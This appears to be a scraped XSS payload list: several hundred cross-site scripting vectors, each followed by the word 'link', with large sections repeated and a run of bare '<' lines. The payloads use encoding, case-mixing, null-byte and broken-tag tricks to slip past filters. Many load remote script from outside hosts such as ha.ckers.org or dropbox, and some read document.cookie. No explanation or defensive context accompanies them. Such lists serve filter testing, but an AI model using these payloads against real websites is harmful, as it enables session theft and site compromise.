<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> |
link |
<style onreadystatechange=javascript:javascript:alert(1);></style> |
link |
<embed code=javascript:javascript:alert(1);></embed> |
link |
<embed src=%(jscript)s></embed> |
link |
<frameset onload=javascript:javascript:alert(1)></frameset> |
link |
<object onerror=javascript:javascript:alert(1)> |
link |
<embed type="image" src=%(scriptlet)s></embed> |
link |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> |
link |
<a href="javAascript:javascript:alert(1)">test1</a> |
link |
<a href="javaascript:javascript:alert(1)">test1</a> |
link |
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> |
link |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; |
link |
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- |
link |
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |
link |
'';!--"<XSS>=&{()} |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> |
link |
<a onmouseover="alert(document.cookie)">xxs link</a> |
link |
<a onmouseover=alert(document.cookie)>xxs link</a> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG SRC=# onmouseover="alert('xxs')"> |
link |
<IMG SRC="jav	ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out |
link |
<IMG SRC="  javascript:alert('XSS');"> |
link |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
link |
<SCRIPT SRC=//ha.ckers.org/.j> |
link |
<iframe src=http://ha.ckers.org/scriptlet.html < |
link |
\";alert('XSS');// |
link |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<BODY BACKGROUND="javascript:alert('XSS')"> |
link |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> |
link |
<IMG SRC="livescript:[code]"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<BGSOUND SRC="javascript:alert('XSS');"> |
link |
<BR SIZE="&{alert('XSS')}"> |
link |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
link |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
link |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
link |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> |
link |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
link |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> |
link |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> |
link |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
<XSS STYLE="xss:expression(alert('XSS'))"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
link |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
link |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<BASE HREF="javascript:alert('XSS');//"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> |
link |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> |
link |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> |
link |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser |
link |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
link |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=`>`SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> |
link |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> |
link |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> |
link |
<iframe %00 src="	javascript:prompt(1)	"%00> |
link |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' |
link |
<input/onmouseover="javaSCRIPT:confirm(1)" |
link |
<sVg><scRipt %00>alert(1) {Opera} |
link |
<img/src=`%00` onerror=this.onerror=confirm(1) |
link |
<form><isindex formaction="javascript:confirm(1)" |
link |
<img src=`%00`
 onerror=alert(1)
 |
link |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> |
link |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? |
link |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> |
link |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ |
link |
"><h1/onmouseover='\u0061lert(1)'>%00 |
link |
<iframe/src="data:text/html,<svg onload=alert(1)>"> |
link |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> |
link |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script |
link |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} |
link |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> |
link |
<iframe src=javascript:alert(document.location)> |
link |
<form><a href="javascript:\u0061lert(1)">X |
link |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> |
link |
<img/	  src=`~`onerror=prompt(1)> |
link |
<form><iframe 	  src="javascript:alert(1)" 	;> |
link |
http://www.google<script .com>alert(document.location)</script |
link |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a |
link |
<img/src=@  onerror = prompt('1') |
link |
<style/onload=prompt('XSS') |
link |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ |
link |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( |
link |
�</form><input type="date" onfocus="alert(1)"> |
link |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> |
link |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ |
link |
<iframe srcdoc='<body onload=prompt(1)>'> |
link |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> |
link |
<style/onload=<!--	> alert (1)> |
link |
<///style///><span %2F onmousemove='alert(1)'>SPAN |
link |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) |
link |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' |
link |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} |
link |
<marquee onstart='javascript:alert(1)'>^__^ |
link |
<div/style="width:expression(confirm(1))">X</div> {IE7} |
link |
<iframe/%00/ src=javaSCRIPT:alert(1) |
link |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// |
link |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> |
link |
//|\\ <script //|\\ src='<https://dl.dropbox.com/u/13018058/js.js'>> //|\\ </script //|\\ |
link |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> |
link |
<a/href="javascript: javascript:prompt(1)"><input type="X"> |
link |
</plaintext\></|\><plaintext/onmouseover=prompt(1) |
link |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} |
link |
<a href="javascript:\u0061le%72t(1)"><button> |
link |
<div onmouseover='alert(1)'>DIV</div> |
link |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> |
link |
<a href="jAvAsCrIpT:alert(1)">X</a> |
link |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<var onmouseover="prompt(1)">On Mouse Over</var> |
link |
<a href=javascript:alert(document.cookie)>Click Here</a> |
link |
<img src="/" =_=" title="onerror='prompt(1)'"> |
link |
<%<!--'%><script>alert(1);</script --> |
link |
<script src="data:text/javascript,alert(1)"></script> |
link |
<svg/onload=alert(1) |
link |
<input value=<><iframe/src=javascript:confirm(1) |
link |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> |
link |
http://www.<script>alert(1)</script .com |
link |
<svg><script ?>alert(1) |
link |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> |
link |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> |
link |
<svg contentScriptType=text/vbs><script>MsgBox+1 |
link |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a |
link |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> |
link |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F |
link |
<object data=javascript:\u0061le%72t(1)> |
link |
<script itworksinallbrowsers>/*<script* */alert(1)</script |
link |
<img src ?itworksonchrome?\/onerror = alert(1) |
link |
<svg><script>//
confirm(1);</script </svg> |
link |
<svg><script onlypossibleinopera:-)> alert(1) |
link |
<div/onmouseover='alert(1)'> style="x:"> |
link |
"><img src=x onerror=window.open('https://www.google.com/');> |
link |
<form><button formaction=javascript:alert(1)>CLICKME |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> |
link |
‘; alert(1); |
link |
‘)alert(1);// |
link |
<ScRiPt>alert(1)</sCriPt> |
link |
<IMG SRC=”javascript:alert(‘XSS’);”> |
link |
<IMG SRC=javascript:alert("XSS")> |
link |
<IMG SRC=javascript:alert(‘XSS’)> |
link |
<img src=xss onerror=alert(1)> |
link |
<iframe %00 src="	javascript:prompt(1)	"%00> |
link |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' |
link |
<input/onmouseover="javaSCRIPT:confirm(1)" |
link |
<sVg><scRipt %00>alert(1) {Opera} |
link |
<img/src=`%00`onerror=this.onerror=confirm(1) |
link |
<form><isindex formaction="javascript:confirm(1)" |
link |
<img src=`%00`
 onerror=alert(1)
 |
link |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> |
link |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? |
link |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> |
link |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ |
link |
"><h1/onmouseover='\u0061lert(1)'>%00 |
link |
<iframe/src="data:text/html,<svg onload=alert(1)>"> |
link |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> |
link |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script |
link |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} |
link |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> |
link |
<iframe src=javascript:alert(document.location)> |
link |
<form><a href="javascript:\u0061lert(1)">X |
link |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> |
link |
<img/	  src=`~`onerror=prompt(1)> |
link |
<form><iframe 	  src="javascript:alert(1)" 	;> |
link |
http://www.google<script .com>alert(document.location)</script |
link |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a |
link |
<img/src=@  onerror = prompt('1') |
link |
<style/onload=prompt('XSS') |
link |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ |
link |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( |
link |
�</form><input type="date" onfocus="alert(1)"> |
link |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> |
link |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ |
link |
<iframe srcdoc='<body onload=prompt(1)>'> |
link |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> |
link |
<style/onload=<!--	> alert (1)> |
link |
<///style///><span %2F onmousemove='alert(1)'>SPAN |
link |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) |
link |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' |
link |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} |
link |
<marquee onstart='javascript:alert(1)'>^__^ |
link |
<div/style="width:expression(confirm(1))">X</div> {IE7} |
link |
<iframe/%00/ src=javaSCRIPT:alert(1) |
link |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// |
link |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> |
link |
//|\\ <script //|\\ src='<https://dl.dropbox.com/u/13018058/js.js'>> //|\\ </script //|\\ |
link |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> |
link |
<a/href="javascript: javascript:prompt(1)"><input type="X"> |
link |
</plaintext\></|\><plaintext/onmouseover=prompt(1) |
link |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} |
link |
<a href="javascript:\u0061le%72t(1)"><button> |
link |
<div onmouseover='alert(1)'>DIV</div> |
link |
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> |
link |
<a href="jAvAsCrIpT:alert(1)">X</a> |
link |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<var onmouseover="prompt(1)">On Mouse Over</var> |
link |
<a href=javascript:alert(document.cookie)>Click Here</a> |
link |
<img src="/" =_=" title="onerror='prompt(1)'"> |
link |
<%<!--'%><script>alert(1);</script --> |
link |
<script src="data:text/javascript,alert(1)"></script> |
link |
<svg/onload=alert(1) |
link |
<input value=<><iframe/src=javascript:confirm(1) |
link |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> |
link |
http://www.<script>alert(1)</script .com |
link |
<svg><script ?>alert(1) |
link |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> |
link |
<svg contentScriptType=text/vbs><script>MsgBox+1 |
link |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a |
link |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> |
link |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F |
link |
<object data=javascript:\u0061le%72t(1)> |
link |
<script itworksinallbrowsers>/*<script* */alert(1)</script |
link |
<img src ?itworksonchrome?\/onerror = alert(1) |
link |
<svg><script>//
confirm(1);</script </svg> |
link |
<svg><script onlypossibleinopera:-)> alert(1) |
link |
<div/onmouseover='alert(1)'> style="x:"> |
link |
"><img src=x onerror=window.open('https://www.google.com/');> |
link |
<form><button formaction=javascript:alert(1)>CLICKME |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> |
link |
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> |
link |
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG SRC=”jav ascript:alert(‘XSS’);”> |
link |
<IMG SRC=”jav	ascript:alert(‘XSS’);”> |
link |
<<SCRIPT>alert(“XSS”);//<</SCRIPT> |
link |
%253cscript%253ealert(1)%253c/script%253e |
link |
“><s”%2b”cript>alert(document.cookie)</script> |
link |
foo<script>alert(1)</script> |
link |
<scr<script>ipt>alert(1)</scr</script>ipt> |
link |
<BODY BACKGROUND=”javascript:alert(‘XSS’)”> |
link |
<BODY ONLOAD=alert(‘XSS’)> |
link |
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> |
link |
<IMG SRC=”javascript:alert(‘XSS’)” |
link |
<iframe src=http://ha.ckers.org/scriptlet.html < |
link |
<img src=javascript:alert("XSS")> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<script>alert("XSS");</script>&search=1 |
link |
<h1><font color=blue>hellox worldss</h1> |
link |
<input onblur=write(XSS) autofocus><input autofocus> |
link |
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> |
link |
<form><button formaction="javascript:alert(XSS)">lol |
link |
<!--<img src="--><img src=x onerror=alert(XSS)//"> |
link |
<![><img src="]><img src=x onerror=alert(XSS)//"> |
link |
<style><img src="</style><img src=x onerror=alert(XSS)//"> |
link |
<? foo="><x foo='?><script>alert(1)</script>'>"> |
link |
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> |
link |
<% foo><x foo="%><script>alert(123)</script>"> |
link |
<div style="font-family:'foo ;color:red;';">LOL |
link |
<script>({0:#0=alert/#0#/#0#(0)})</script> |
link |
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> |
link |
<SCRIPT>alert(/XSS/.source)</SCRIPT> |
link |
\\";alert('XSS');// |
link |
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> |
link |
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> |
link |
<BODY BACKGROUND=\"javascript:alert('XSS')\"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<IMG DYNSRC=\"javascript:alert('XSS')\"> |
link |
<IMG LOWSRC=\"javascript:alert('XSS')\"> |
link |
<BGSOUND SRC=\"javascript:alert('XSS');\"> |
link |
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> |
link |
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> |
link |
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> |
link |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
link |
<XSS STYLE=\"behavior: url(xss.htc);\"> |
link |
<IMG SRC='vbscript:msgbox(\"XSS\")'> |
link |
<IMG SRC=\"mocha:[code]\"> |
link |
<IMG SRC=\"livescript:[code]\"> |
link |
žscriptualert(EXSSE)ž/scriptu |
link |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> |
link |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" |
link |
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> |
link |
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> |
link |
<TABLE BACKGROUND=\"javascript:alert('XSS')\"> |
link |
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> |
link |
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> |
link |
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> |
link |
<DIV STYLE=\"width: expression(alert('XSS'));\"> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> |
link |
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"> |
link |
<XSS STYLE=\"xss:expression(alert('XSS'))\"> |
link |
exp/*<A STYLE='no\xss:noxss(\"*//*\"); |
link |
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> |
link |
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> |
link |
<SCRIPT>alert('XSS');</SCRIPT> |
link |
<![endif]--> |
link |
<BASE HREF=\"javascript:alert('XSS');//\"> |
link |
a=\"get\"; |
link |
b=\"URL(\\"\"; |
link |
c=\"javascript:\"; |
link |
d=\"alert('XSS');\\")\"; |
link |
eval(a+b+c+d); |
link |
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> |
link |
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> |
link |
<XML SRC=\"xsstest.xml\" ID=I></XML> |
link |
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> |
link |
<HTML><BODY> |
link |
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> |
link |
<?import namespace=\"t\" implementation=\"#default#time2\"> |
link |
</BODY></HTML> |
link |
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT> |
link |
<? echo('<SCR)'; |
link |
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> |
link |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser |
link |
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> |
link |
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<SCRIPT a=`>`SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<A HREF=\"http://66.102.7.147/\">XSS</A> |
link |
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> |
link |
<A HREF=\"http://1113982867/\">XSS</A> |
link |
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A> |
link |
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> |
link |
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> |
link |
<A HREF=\"//www.google.com/\">XSS</A> |
link |
<A HREF=\"//google\">XSS</A> |
link |
<A HREF=\"http://ha.ckers.org@google\">XSS</A> |
link |
<A HREF=\"http://google:ha.ckers.org\">XSS</A> |
link |
<A HREF=\"http://google.com/\">XSS</A> |
link |
<A HREF=\"http://www.google.com./\">XSS</A> |
link |
< |
link |
%3C |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
< |
link |
\x3c |
link |
\x3C |
link |
\u003c |
link |
\u003C |
link |
<iframe src=http://ha.ckers.org/scriptlet.html> |
link |
<IMG SRC=\"javascript:alert('XSS')\" |
link |
<SCRIPT SRC=//ha.ckers.org/.js> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> |
link |
<<SCRIPT>alert(\"XSS\");//<</SCRIPT> |
link |
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")> |
link |
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> |
link |
<IMG SRC=\" javascript:alert('XSS');\"> |
link |
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out |
link |
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out |
link |
<IMG SRC=\"jav
ascript:alert('XSS');\"> |
link |
<IMG SRC=\"jav
ascript:alert('XSS');\"> |
link |
<IMG SRC=\"jav	ascript:alert('XSS');\"> |
link |
<IMG SRC=javascript:alert('XSS')> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> |
link |
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`> |
link |
<IMG SRC=javascript:alert("XSS")> |
link |
<IMG SRC=JaVaScRiPt:alert('XSS')> |
link |
<IMG SRC=javascript:alert('XSS')> |
link |
<IMG SRC=\"javascript:alert('XSS');\"> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
'';!--\"<XSS>=&{()} |
link |
'';!--"<XSS>=&{()} |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
<IMG SRC=javascrscriptipt:alert('XSS')> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<IMG SRC="  javascript:alert('XSS');"> |
link |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> |
link |
\";alert('XSS');// |
link |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
link |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
link |
<XSS STYLE="xss:expression(alert('XSS'))"> |
link |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> |
link |
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> |
link |
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); |
link |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> |
link |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION |
link |
<form><button formaction="javascript:alert(123)">crosssitespt |
link |
<frameset onload=alert(123)> |
link |
<!--<img src="--><img src=x onerror=alert(123)//"> |
link |
<style><img src="</style><img src=x onerror=alert(123)//"> |
link |
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> |
link |
